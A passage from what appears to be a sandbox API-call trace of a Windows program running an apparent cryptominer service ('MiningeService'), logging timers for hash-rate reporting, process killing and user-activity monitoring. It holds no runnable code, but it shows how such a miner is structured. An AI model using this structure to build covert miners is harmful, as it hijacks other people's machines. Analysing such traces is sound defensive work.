out: lpMultiByteStr="GetCurrentThemeName", lpUsedDefaultChar=0x0) returned 19 [0287.377] GetProcAddress (hModule=0x74430000, lpProcName="GetCurrentThemeName") returned 0x744563ae [0287.377] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeDocumentationProperty", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0287.377] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeDocumentationProperty", cchWideChar=29, lpMultiByteStr=0x9dfd2c, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeDocumentationProperty", lpUsedDefaultChar=0x0) returned 29 [0287.378] GetProcAddress (hModule=0x74430000, lpProcName="GetThemeDocumentationProperty") returned 0x7446c346 [0287.378] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="DrawThemeParentBackground", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0287.378] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="DrawThemeParentBackground", cchWideChar=25, lpMultiByteStr=0x9dfd2c, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DrawThemeParentBackground", lpUsedDefaultChar=0x0) returned 25 [0287.378] GetProcAddress (hModule=0x74430000, lpProcName="DrawThemeParentBackground") returned 0x7444e776 [0287.378] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="EnableTheming", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0287.378] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="EnableTheming", cchWideChar=13, lpMultiByteStr=0x9c390c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EnableTheming", lpUsedDefaultChar=0x0) returned 13 [0287.378] GetProcAddress (hModule=0x74430000, lpProcName="EnableTheming") returned 0x7446c9ff [0287.378] GetFileVersionInfoSizeW (in: lptstrFilename="comctl32.dll", lpdwHandle=0x18fecc | out: lpdwHandle=0x18fecc) returned 0x73c [0287.550] GetFileVersionInfoW (in: lptstrFilename="comctl32.dll", dwHandle=0x0, dwLen=0x73c, lpData=0x9507a0 | out: lpData=0x9507a0) returned 1 [0287.550] VerQueryValueW (in: pBlock=0x9507a0, lpSubBlock="\\", lplpBuffer=0x18fec4, puLen=0x18fec0 | out: lplpBuffer=0x18fec4*=0x9507c8, puLen=0x18fec0) returned 1 [0287.550] IsAppThemed () returned 0x0 [0287.551] GetCurrentThreadId () returned 0xd44 [0287.551] SetWindowsHookExW (idHook=5, lpfn=0x5ad504, hmod=0x0, dwThreadId=0xd44) returned 0x100c9 [0287.551] LoadStringW (in: hInstance=0x400000, uID=0xfe56, lpBuffer=0x18bf04, cchBufferMax=4096 | out: lpBuffer="VCL Style File") returned 0xe [0287.552] CoInitialize (pvReserved=0x0) returned 0x1 [0287.552] GetCurrentThreadId () returned 0xd44 [0287.552] ResetEvent (hEvent=0xe4) returned 1 [0287.552] GetCurrentThreadId () returned 0xd44 [0287.552] GetCurrentThreadId () returned 0xd44 [0287.552] GetCurrentThreadId () returned 0xd44 [0287.552] ResetEvent (hEvent=0xe4) returned 1 [0287.553] GetCurrentThreadId () returned 0xd44 [0287.553] GetCurrentThreadId () returned 0xd44 [0287.553] GetCurrentThreadId () returned 0xd44 [0287.553] GetCurrentThreadId () returned 0xd44 [0287.553] VirtualQuery (in: lpAddress=0x5f0760, lpBuffer=0x18fe60, dwLength=0x1c | out: lpBuffer=0x18fe60*(BaseAddress=0x5f0000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x222000, State=0x1000, Protect=0x20, Type=0x1000000)) returned 0x1c [0287.553] FindResourceW (hModule=0x400000, lpName="TService", lpType=0xa) returned 0x0 [0287.553] VirtualQuery (in: lpAddress=0x7917bc, lpBuffer=0x18fe84, dwLength=0x1c | out: lpBuffer=0x18fe84*(BaseAddress=0x791000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x81000, State=0x1000, Protect=0x20, Type=0x1000000)) returned 0x1c [0287.553] FindResourceW (hModule=0x400000, lpName="TMiningeService", lpType=0xa) returned 0x8b90b0 [0287.553] FindResourceW (hModule=0x400000, lpName="TMiningeService", lpType=0xa) returned 0x8b90b0 [0287.553] LoadResource (hModule=0x400000, hResInfo=0x8b90b0) returned 0x8d8684 [0287.553] SizeofResource (hModule=0x400000, hResInfo=0x8b90b0) returned 0x5a7 [0287.553] LockResource (hResData=0x8d8684) returned 0x8d8684 [0287.554] GetCurrentThreadId () returned 0xd44 [0287.554] GetCurrentThreadId () returned 0xd44 [0287.554] GetCurrentThreadId () returned 0xd44 [0287.554] GetCurrentThreadId () returned 0xd44 [0287.554] CharLowerBuffW (in: lpsz="MiningeService", cchLength=0xe | out: lpsz="miningeservice") returned 0xe [0287.554] GetCurrentThreadId () returned 0xd44 [0287.554] GetCurrentThreadId () returned 0xd44 [0287.554] GetCurrentThreadId () returned 0xd44 [0287.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ServiceCreate", cchWideChar=13, lpMultiByteStr=0x18fbb5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ServiceCreate", lpUsedDefaultChar=0x0) returned 13 [0287.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ServiceDestroy", cchWideChar=14, lpMultiByteStr=0x18fbb5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ServiceDestroy", lpUsedDefaultChar=0x0) returned 14 [0287.554] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fbe9, cbMultiByte=14, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0287.554] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fbe9, cbMultiByte=14, lpWideCharStr=0x9e005c, cchWideChar=14 | out: lpWideCharStr="MiningeService") returned 14 [0287.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ServiceStart", cchWideChar=12, lpMultiByteStr=0x18fbb5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ServiceStart", lpUsedDefaultChar=0x0) returned 12 [0287.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ServiceStop", cchWideChar=11, lpMultiByteStr=0x18fbb5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ServiceStop\x0b", lpUsedDefaultChar=0x0) returned 11 [0287.555] WSAStartup (in: wVersionRequired=0x101, lpWSAData=0x83ec9c | out: lpWSAData=0x83ec9c) returned 0 [0287.555] GetCurrentThreadId () returned 0xd44 [0287.555] GetCurrentThreadId () returned 0xd44 [0287.555] CharLowerBuffW (in: lpsz="ClientSocket1", cchLength=0xd | out: lpsz="clientsocket1") returned 0xd [0287.555] CharLowerBuffW (in: lpsz="ResoveryMaining", cchLength=0xf | out: lpsz="resoverymaining") returned 0xf [0287.555] CharLowerBuffW (in: lpsz="ResoveryConnection", cchLength=0x12 | out: lpsz="resoveryconnection") returned 0x12 [0287.555] CharLowerBuffW (in: lpsz="sleepconnect", cchLength=0xc | out: lpsz="sleepconnect") returned 0xc [0287.555] CharLowerBuffW (in: lpsz="CloseProcessTimer", cchLength=0x11 | out: lpsz="closeprocesstimer") returned 0x11 [0287.555] CharLowerBuffW (in: lpsz="SystemStatusTimer", cchLength=0x11 | out: lpsz="systemstatustimer") returned 0x11 [0287.555] CharLowerBuffW (in: lpsz="StartUpdateKMTimer", cchLength=0x12 | out: lpsz="startupdatekmtimer") returned 0x12 [0287.555] CharLowerBuffW (in: lpsz="CloseProcessMtimer", cchLength=0x12 | out: lpsz="closeprocessmtimer") returned 0x12 [0287.555] CharLowerBuffW (in: lpsz="UpdateSendHashRate", cchLength=0x12 | out: lpsz="updatesendhashrate") returned 0x12 [0287.555] CharLowerBuffW (in: lpsz="UpdaeBase", cchLength=0x9 | out: lpsz="updaebase") returned 0x9 [0287.555] CharLowerBuffW (in: lpsz="OfflineTimer", cchLength=0xc | out: lpsz="offlinetimer") returned 0xc [0287.555] CharLowerBuffW (in: lpsz="RegActivityUserKillMain", cchLength=0x17 | out: lpsz="regactivityuserkillmain") returned 0x17 [0287.555] CharLowerBuffW (in: lpsz="HashRateGraphics", cchLength=0x10 | out: lpsz="hashrategraphics") returned 0x10 [0287.555] GetCurrentThreadId () returned 0xd44 [0287.555] CharLowerBuffW (in: lpsz="ClientSocket1", cchLength=0xd | out: lpsz="clientsocket1") returned 0xd [0287.555] CharLowerBuffW (in: lpsz="ClientSocket1", cchLength=0xd | out: lpsz="clientsocket1") returned 0xd [0287.555] CharLowerBuffW (in: lpsz="ClientSocket1", cchLength=0xd | out: lpsz="clientsocket1") returned 0xd [0287.555] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ClientSocket1Connecting", cchWideChar=23, lpMultiByteStr=0x18fb05, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ClientSocket1Connecting8û\x18", lpUsedDefaultChar=0x0) returned 23 [0287.556] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ClientSocket1Connect", cchWideChar=20, lpMultiByteStr=0x18fb05, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ClientSocket1Connectü\x18", lpUsedDefaultChar=0x0) returned 20 [0287.556] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ClientSocket1Disconnect", cchWideChar=23, lpMultiByteStr=0x18fb05, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ClientSocket1Disconnect8û\x18", lpUsedDefaultChar=0x0) returned 23 [0287.556] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ClientSocket1Read", cchWideChar=17, lpMultiByteStr=0x18fb05, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ClientSocket1Read@", lpUsedDefaultChar=0x0) returned 17 [0287.556] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ClientSocket1Error", cchWideChar=18, lpMultiByteStr=0x18fb05, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ClientSocket1Error", lpUsedDefaultChar=0x0) returned 18 [0287.556] GetClassInfoW (in: hInstance=0x400000, lpClassName="TPUtilWindow", lpWndClass=0x18fca4 | out: lpWndClass=0x18fca4) returned 1 [0287.556] CreateWindowExW (dwExStyle=0x80, lpClassName="TPUtilWindow", lpWindowName="", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x3002e [0287.556] CallNextHookEx (hhk=0x100c9, nCode=3, wParam=0x3002e, lParam=0x18f808) returned 0x0 [0287.557] SetWindowLongW (hWnd=0x3002e, nIndex=-4, dwNewLong=3018696) returned 4290132 [0287.557] GetCurrentThreadId () returned 0xd44 [0287.557] GetCurrentThreadId () returned 0xd44 [0287.557] GetCurrentThreadId () returned 0xd44 [0287.557] CharLowerBuffW (in: lpsz="ResoveryMaining", cchLength=0xf | out: lpsz="resoverymaining") returned 0xf [0287.557] CharLowerBuffW (in: lpsz="ResoveryMaining", cchLength=0xf | out: lpsz="resoverymaining") returned 0xf [0287.557] CharLowerBuffW (in: lpsz="ResoveryMaining", cchLength=0xf | out: lpsz="resoverymaining") returned 0xf [0287.557] KillTimer (hWnd=0x3002e, uIDEvent=0x1) returned 0 [0287.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ResoveryMainingTimer", cchWideChar=20, lpMultiByteStr=0x18fb05, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ResoveryMainingTimerü\x18", lpUsedDefaultChar=0x0) returned 20 [0287.557] KillTimer (hWnd=0x3002e, uIDEvent=0x1) returned 0 [0287.557] SetTimer (hWnd=0x3002e, nIDEvent=0x1, uElapse=0xea60, lpTimerFunc=0x0) returned 0x1 [0287.557] GetClassInfoW (in: hInstance=0x400000, lpClassName="TPUtilWindow", lpWndClass=0x18fca4 | out: lpWndClass=0x18fca4) returned 1 [0287.557] CreateWindowExW (dwExStyle=0x80, lpClassName="TPUtilWindow", lpWindowName="", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x3006e [0287.557] CallNextHookEx (hhk=0x100c9, nCode=3, wParam=0x3006e, lParam=0x18f808) returned 0x0 [0287.558] SetWindowLongW (hWnd=0x3006e, nIndex=-4, dwNewLong=3018683) returned 4290132 [0287.558] GetCurrentThreadId () returned 0xd44 [0287.558] GetCurrentThreadId () returned 0xd44 [0287.558] GetCurrentThreadId () returned 0xd44 [0287.558] CharLowerBuffW (in: lpsz="ResoveryConnection", cchLength=0x12 | out: lpsz="resoveryconnection") returned 0x12 [0287.558] CharLowerBuffW (in: lpsz="ResoveryConnection", cchLength=0x12 | out: lpsz="resoveryconnection") returned 0x12 [0287.558] CharLowerBuffW (in: lpsz="ResoveryConnection", cchLength=0x12 | out: lpsz="resoveryconnection") returned 0x12 [0287.558] KillTimer (hWnd=0x3006e, uIDEvent=0x1) returned 0 [0287.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ResoveryConnectionTimer", cchWideChar=23, lpMultiByteStr=0x18fb05, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ResoveryConnectionTimer8û\x18", lpUsedDefaultChar=0x0) returned 23 [0287.558] KillTimer (hWnd=0x3006e, uIDEvent=0x1) returned 0 [0287.558] GetClassInfoW (in: hInstance=0x400000, lpClassName="TPUtilWindow", lpWndClass=0x18fca4 | out: lpWndClass=0x18fca4) returned 1 [0287.558] CreateWindowExW (dwExStyle=0x80, lpClassName="TPUtilWindow", lpWindowName="", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x30056 [0287.558] CallNextHookEx (hhk=0x100c9, nCode=3, wParam=0x30056, lParam=0x18f808) returned 0x0 [0287.558] SetWindowLongW (hWnd=0x30056, nIndex=-4, dwNewLong=3018670) returned 4290132 [0287.558] GetCurrentThreadId () returned 0xd44 [0287.558] GetCurrentThreadId () returned 0xd44 [0287.558] GetCurrentThreadId () returned 0xd44 [0287.558] CharLowerBuffW (in: lpsz="sleepconnect", cchLength=0xc | out: lpsz="sleepconnect") returned 0xc [0287.558] CharLowerBuffW (in: lpsz="sleepconnect", cchLength=0xc | out: lpsz="sleepconnect") returned 0xc [0287.558] CharLowerBuffW (in: lpsz="sleepconnect", cchLength=0xc | out: lpsz="sleepconnect") returned 0xc [0287.558] KillTimer (hWnd=0x30056, uIDEvent=0x1) returned 0 [0287.559] KillTimer (hWnd=0x30056, uIDEvent=0x1) returned 0 [0287.559] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SleepConnectTimer", cchWideChar=17, lpMultiByteStr=0x18fb05, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SleepConnectTimer@", lpUsedDefaultChar=0x0) returned 17 [0287.559] KillTimer (hWnd=0x30056, uIDEvent=0x1) returned 0 [0287.559] GetClassInfoW (in: hInstance=0x400000, lpClassName="TPUtilWindow", lpWndClass=0x18fca4 | out: lpWndClass=0x18fca4) returned 1 [0287.559] CreateWindowExW (dwExStyle=0x80, lpClassName="TPUtilWindow", lpWindowName="", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x200a4 [0287.559] CallNextHookEx (hhk=0x100c9, nCode=3, wParam=0x200a4, lParam=0x18f808) returned 0x0 [0287.559] SetWindowLongW (hWnd=0x200a4, nIndex=-4, dwNewLong=3018657) returned 4290132 [0287.559] GetCurrentThreadId () returned 0xd44 [0287.559] GetCurrentThreadId () returned 0xd44 [0287.559] GetCurrentThreadId () returned 0xd44 [0287.559] CharLowerBuffW (in: lpsz="CloseProcessTimer", cchLength=0x11 | out: lpsz="closeprocesstimer") returned 0x11 [0287.559] CharLowerBuffW (in: lpsz="CloseProcessTimer", cchLength=0x11 | out: lpsz="closeprocesstimer") returned 0x11 [0287.559] CharLowerBuffW (in: lpsz="CloseProcessTimer", cchLength=0x11 | out: lpsz="closeprocesstimer") returned 0x11 [0287.559] KillTimer (hWnd=0x200a4, uIDEvent=0x1) returned 0 [0287.559] KillTimer (hWnd=0x200a4, uIDEvent=0x1) returned 0 [0287.559] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CloseProcessTimerTimer", cchWideChar=22, lpMultiByteStr=0x18fb05, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseProcessTimerTimer", lpUsedDefaultChar=0x0) returned 22 [0287.559] KillTimer (hWnd=0x200a4, uIDEvent=0x1) returned 0 [0287.559] GetClassInfoW (in: hInstance=0x400000, lpClassName="TPUtilWindow", lpWndClass=0x18fca4 | out: lpWndClass=0x18fca4) returned 1 [0287.559] CreateWindowExW (dwExStyle=0x80, lpClassName="TPUtilWindow", lpWindowName="", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x30096 [0287.559] CallNextHookEx (hhk=0x100c9, nCode=3, wParam=0x30096, lParam=0x18f808) returned 0x0 [0287.560] SetWindowLongW (hWnd=0x30096, nIndex=-4, dwNewLong=3018644) returned 4290132 [0287.560] GetCurrentThreadId () returned 0xd44 [0287.560] GetCurrentThreadId () returned 0xd44 [0287.560] GetCurrentThreadId () returned 0xd44 [0287.560] CharLowerBuffW (in: lpsz="SystemStatusTimer", cchLength=0x11 | out: lpsz="systemstatustimer") returned 0x11 [0287.560] CharLowerBuffW (in: lpsz="SystemStatusTimer", cchLength=0x11 | out: lpsz="systemstatustimer") returned 0x11 [0287.560] CharLowerBuffW (in: lpsz="SystemStatusTimer", cchLength=0x11 | out: lpsz="systemstatustimer") returned 0x11 [0287.560] KillTimer (hWnd=0x30096, uIDEvent=0x1) returned 0 [0287.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SystemStatusTimerTimer", cchWideChar=22, lpMultiByteStr=0x18fb05, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemStatusTimerTimer", lpUsedDefaultChar=0x0) returned 22 [0287.560] KillTimer (hWnd=0x30096, uIDEvent=0x1) returned 0 [0287.560] SetTimer (hWnd=0x30096, nIDEvent=0x1, uElapse=0x1b58, lpTimerFunc=0x0) returned 0x1 [0287.560] GetClassInfoW (in: hInstance=0x400000, lpClassName="TPUtilWindow", lpWndClass=0x18fca4 | out: lpWndClass=0x18fca4) returned 1 [0287.560] CreateWindowExW (dwExStyle=0x80, lpClassName="TPUtilWindow", lpWindowName="", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x2005e [0287.560] CallNextHookEx (hhk=0x100c9, nCode=3, wParam=0x2005e, lParam=0x18f808) returned 0x0 [0287.560] SetWindowLongW (hWnd=0x2005e, nIndex=-4, dwNewLong=3018631) returned 4290132 [0287.560] GetCurrentThreadId () returned 0xd44 [0287.560] GetCurrentThreadId () returned 0xd44 [0287.560] GetCurrentThreadId () returned 0xd44 [0287.560] CharLowerBuffW (in: lpsz="StartUpdateKMTimer", cchLength=0x12 | out: lpsz="startupdatekmtimer") returned 0x12 [0287.560] CharLowerBuffW (in: lpsz="StartUpdateKMTimer", cchLength=0x12 | out: lpsz="startupdatekmtimer") returned 0x12 [0287.560] CharLowerBuffW (in: lpsz="StartUpdateKMTimer", cchLength=0x12 | out: lpsz="startupdatekmtimer") returned 0x12 [0287.561] KillTimer (hWnd=0x2005e, uIDEvent=0x1) returned 0 [0287.561] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StartUpdateKMTimerTimer", cchWideChar=23, lpMultiByteStr=0x18fb05, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StartUpdateKMTimerTimer8û\x18", lpUsedDefaultChar=0x0) returned 23 [0287.561] KillTimer (hWnd=0x2005e, uIDEvent=0x1) returned 0 [0287.561] GetClassInfoW (in: hInstance=0x400000, lpClassName="TPUtilWindow", lpWndClass=0x18fca4 | out: lpWndClass=0x18fca4) returned 1 [0287.561] CreateWindowExW (dwExStyle=0x80, lpClassName="TPUtilWindow", lpWindowName="", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x4005a [0287.561] CallNextHookEx (hhk=0x100c9, nCode=3, wParam=0x4005a, lParam=0x18f808) returned 0x0 [0287.561] SetWindowLongW (hWnd=0x4005a, nIndex=-4, dwNewLong=3018618) returned 4290132 [0287.561] GetCurrentThreadId () returned 0xd44 [0287.561] GetCurrentThreadId () returned 0xd44 [0287.561] GetCurrentThreadId () returned 0xd44 [0287.561] CharLowerBuffW (in: lpsz="CloseProcessMtimer", cchLength=0x12 | out: lpsz="closeprocessmtimer") returned 0x12 [0287.561] CharLowerBuffW (in: lpsz="CloseProcessMtimer", cchLength=0x12 | out: lpsz="closeprocessmtimer") returned 0x12 [0287.561] CharLowerBuffW (in: lpsz="CloseProcessMtimer", cchLength=0x12 | out: lpsz="closeprocessmtimer") returned 0x12 [0287.561] KillTimer (hWnd=0x4005a, uIDEvent=0x1) returned 0 [0287.561] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CloseProcessMtimerTimer", cchWideChar=23, lpMultiByteStr=0x18fb05, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseProcessMtimerTimer8û\x18", lpUsedDefaultChar=0x0) returned 23 [0287.561] KillTimer (hWnd=0x4005a, uIDEvent=0x1) returned 0 [0287.561] GetClassInfoW (in: hInstance=0x400000, lpClassName="TPUtilWindow", lpWndClass=0x18fca4 | out: lpWndClass=0x18fca4) returned 1 [0287.563] CreateWindowExW (dwExStyle=0x80, lpClassName="TPUtilWindow", lpWindowName="", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x30044 [0287.563] CallNextHookEx (hhk=0x100c9, nCode=3, wParam=0x30044, lParam=0x18f808) returned 0x0 [0287.563] SetWindowLongW (hWnd=0x30044, nIndex=-4, dwNewLong=3018605) returned 4290132 [0287.563] GetCurrentThreadId () returned 0xd44 [0287.563] GetCurrentThreadId () returned 0xd44 [0287.563] GetCurrentThreadId () returned 0xd44 [0287.563] CharLowerBuffW (in: lpsz="UpdateSendHashRate", cchLength=0x12 | out: lpsz="updatesendhashrate") returned 0x12 [0287.563] CharLowerBuffW (in: lpsz="UpdateSendHashRate", cchLength=0x12 | out: lpsz="updatesendhashrate") returned 0x12 [0287.563] CharLowerBuffW (in: lpsz="UpdateSendHashRate", cchLength=0x12 | out: lpsz="updatesendhashrate") returned 0x12 [0287.563] KillTimer (hWnd=0x30044, uIDEvent=0x1) returned 0 [0287.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UpdateSendHashRateTimer", cchWideChar=23, lpMultiByteStr=0x18fb05, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UpdateSendHashRateTimer8û\x18", lpUsedDefaultChar=0x0) returned 23 [0287.563] KillTimer (hWnd=0x30044, uIDEvent=0x1) returned 0 [0287.563] SetTimer (hWnd=0x30044, nIDEvent=0x1, uElapse=0x927c0, lpTimerFunc=0x0) returned 0x1 [0287.563] GetClassInfoW (in: hInstance=0x400000, lpClassName="TPUtilWindow", lpWndClass=0x18fca4 | out: lpWndClass=0x18fca4) returned 1 [0287.563] CreateWindowExW (dwExStyle=0x80, lpClassName="TPUtilWindow", lpWindowName="", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x30060 [0287.563] CallNextHookEx (hhk=0x100c9, nCode=3, wParam=0x30060, lParam=0x18f808) returned 0x0 [0287.564] SetWindowLongW (hWnd=0x30060, nIndex=-4, dwNewLong=3018592) returned 4290132 [0287.564] GetCurrentThreadId () returned 0xd44 [0287.564] GetCurrentThreadId () returned 0xd44 [0287.564] GetCurrentThreadId () returned 0xd44 [0287.564] CharLowerBuffW (in: lpsz="UpdaeBase", cchLength=0x9 | out: lpsz="updaebase") returned 0x9 [0287.564] CharLowerBuffW (in: lpsz="UpdaeBase", cchLength=0x9 | out: lpsz="updaebase") returned 0x9 [0287.564] CharLowerBuffW (in: lpsz="UpdaeBase", cchLength=0x9 | out: lpsz="updaebase") returned 0x9 [0287.564] KillTimer (hWnd=0x30060, uIDEvent=0x1) returned 0 [0287.564] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UpdaeBaseTimer", cchWideChar=14, lpMultiByteStr=0x18fb05, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UpdaeBaseTimer", lpUsedDefaultChar=0x0) returned 14 [0287.564] KillTimer (hWnd=0x30060, uIDEvent=0x1) returned 0 [0287.564] SetTimer (hWnd=0x30060, nIDEvent=0x1, uElapse=0xea60, lpTimerFunc=0x0) returned 0x1 [0287.564] GetClassInfoW (in: hInstance=0x400000, lpClassName="TPUtilWindow", lpWndClass=0x18fca4 | out: lpWndClass=0x18fca4) returned 1 [0287.564] CreateWindowExW (dwExStyle=0x80, lpClassName="TPUtilWindow", lpWindowName="", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x30034 [0287.564] CallNextHookEx (hhk=0x100c9, nCode=3, wParam=0x30034, lParam=0x18f808) returned 0x0 [0287.564] SetWindowLongW (hWnd=0x30034, nIndex=-4, dwNewLong=3018579) returned 4290132 [0287.564] GetCurrentThreadId () returned 0xd44 [0287.565] GetCurrentThreadId () returned 0xd44 [0287.565] GetCurrentThreadId () returned 0xd44 [0287.565] CharLowerBuffW (in: lpsz="OfflineTimer", cchLength=0xc | out: lpsz="offlinetimer") returned 0xc [0287.565] CharLowerBuffW (in: lpsz="OfflineTimer", cchLength=0xc | out: lpsz="offlinetimer") returned 0xc [0287.565] CharLowerBuffW (in: lpsz="OfflineTimer", cchLength=0xc | out: lpsz="offlinetimer") returned 0xc [0287.565] KillTimer (hWnd=0x30034, uIDEvent=0x1) returned 0 [0287.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OfflineTimerTimer", cchWideChar=17, lpMultiByteStr=0x18fb05, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfflineTimerTimer@", lpUsedDefaultChar=0x0) returned 17 [0287.565] KillTimer (hWnd=0x30034, uIDEvent=0x1) returned 0 [0287.565] SetTimer (hWnd=0x30034, nIDEvent=0x1, uElapse=0xea60, lpTimerFunc=0x0) returned 0x1 [0287.565] GetClassInfoW (in: hInstance=0x400000, lpClassName="TPUtilWindow", lpWndClass=0x18fca4 | out: lpWndClass=0x18fca4) returned 1 [0287.565] CreateWindowExW (dwExStyle=0x80, lpClassName="TPUtilWindow", lpWindowName="", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x3006c [0287.565] CallNextHookEx (hhk=0x100c9, nCode=3, wParam=0x3006c, lParam=0x18f808) returned 0x0 [0287.565] SetWindowLongW (hWnd=0x3006c, nIndex=-4, dwNewLong=3018566) returned 4290132 [0287.565] GetCurrentThreadId () returned 0xd44 [0287.565] GetCurrentThreadId () returned 0xd44 [0287.565] GetCurrentThreadId () returned 0xd44 [0287.565] CharLowerBuffW (in: lpsz="RegActivityUserKillMain", cchLength=0x17 | out: lpsz="regactivityuserkillmain") returned 0x17 [0287.565] CharLowerBuffW (in: lpsz="RegActivityUserKillMain", cchLength=0x17 | out: lpsz="regactivityuserkillmain") returned 0x17 